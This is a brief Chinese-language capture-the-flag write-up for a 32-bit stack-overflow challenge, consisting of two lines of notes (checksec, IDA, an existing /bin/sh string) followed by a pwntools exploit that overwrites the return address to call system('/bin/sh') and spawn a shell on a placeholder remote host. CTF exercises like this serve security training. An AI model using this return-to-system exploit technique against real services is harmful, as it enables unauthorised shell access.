checksec一下,栈溢出
IDA打开看看,很容易找到溢出点,/bin/sh字符串程序里也有现成的
from pwn import *
from LibcSearcher import *
context.os='linux'
context.arch='i386'
context.log_level='debug'
sl=lambda x:io.sendline(x)
ru=lambda x:io.recvuntil(x)
io=remote('xxx',xxx)
binsh=0x804a024
system=0x8048320
ru(':')
payload=p32(0)*35+p32(system)+p32(0)+p32(binsh)
sl(payload)
io.interactive()